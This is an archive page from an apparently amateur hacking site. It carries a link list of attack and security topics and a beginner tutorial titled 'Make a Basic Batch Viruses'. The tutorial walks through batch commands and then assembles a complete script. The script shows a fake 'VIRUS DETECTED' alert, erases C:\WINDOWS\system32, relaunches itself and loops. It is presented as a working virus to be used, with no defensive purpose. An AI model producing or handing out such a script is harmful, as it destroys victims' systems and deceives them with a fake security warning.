Horas..!!


Archive

Make a Basic Batch Viruses

Sensitive Directory File-1 Sensitive Directory File-2 Shell Dork Advisories and Vulnerabilities-1 Advisories and Vulnerabilities-2 Vectors in C++ Visual Basic Irc Bot Make a Basic Batch Viruses How To Hack a Website (SUPER noobified) PHP Injection - Access Server Modifying Paypal Values on Lowlevel Web's Wireless Hacking Tracking Down a Botnet File of Password Page of Network Data Various Online Devices Vulnerable Servers Error Messages File of Important Information Page of Login Portals Analyzing a Trac SPAM Attempt Knock, Knock, Knockin' on EnGarde's Door (with FWKNOP) RPM and a perl.req Heredoc Bug HowTo: Secure your Ubuntu Apache Web Server :)~~~ Automatically Report all SSH Brute Force Attacks to ISPs <-- ???? :( Website Editing from the Perl Command Line <--wooowww ...... :) SSH Tunnel; HowTo <-- great job's :D Mitigating DNS Cache Poisoning Attacks with iptables Single Packet Authorization with Port Randomization How to write a port scanner in C Server Security <-- hehehehe..... :P Xss (Cross site scripting)  PuttyHijack V1.0 - Hijack SSH/PuTTY Connections on Windows  Pass-The-Hash Toolkit v1.4 Released for Download  SIPcrack - SIP Login Dumper & Hash/Password Cracker  Angry IP Scanner - Cross Platform Port Scanner Advanced SPA with fwknop Profiling psad with Devel::DProf Connecting to Mysql - PHP <-- jo2 Free Software Mapper and Cracker Tools Bot Search by Lateral Exploit from NewOrder and SecurityVulns ru

Make a Basic Batch Viruses

(Article guidelines:
// Description - take out of code examples if you want to test said code
/// More info
xxxx Example)


First of all, you need to know how to make batch files, after you write a code you do "save as" xxxx.bat and then you should be able to use it, and it WON'T be a .txt file

You will also need to know that the text gets messed up in wordpad, and there are two ways to fix that, goto "new document" and then do "plain text document" OR use notepad.

/// For more info on these goto http://commandwindows.com/batch.htm

Now for some commands

[[
in HTML, good for fake virusestitle // changes window title, equivalent of
msg * xxxx // Makes a message box with the letters "xxxx" in it
del // Delete files /// "del c:" deletes files in the c drive, not the folders
erase // same as del
start xxxx.bat // starts file titled xxxx.bat that is in the same folder as running file (good for starting a program already in use)
:xxxx // sub-script
goto // goes to a sub-script
]]


Now lets put it a bit together...

[[
title VIRUS DETECTED // title for window
:xxxx // sub-script :xxxx
msg * Attempting to delete virus, do not close // message
erase "C:\WINDOWS\system32" // Deletes system32
start xxxx.bat // Starts the batch file "xxxx.bat" in the same folder as THIS batch file
msg * Attempt failed, restarting attempt // message
goto xxxx // goes to sub-script :xxxx
]]

And there you have it! Virus!!!

submitted by micchi edited by nad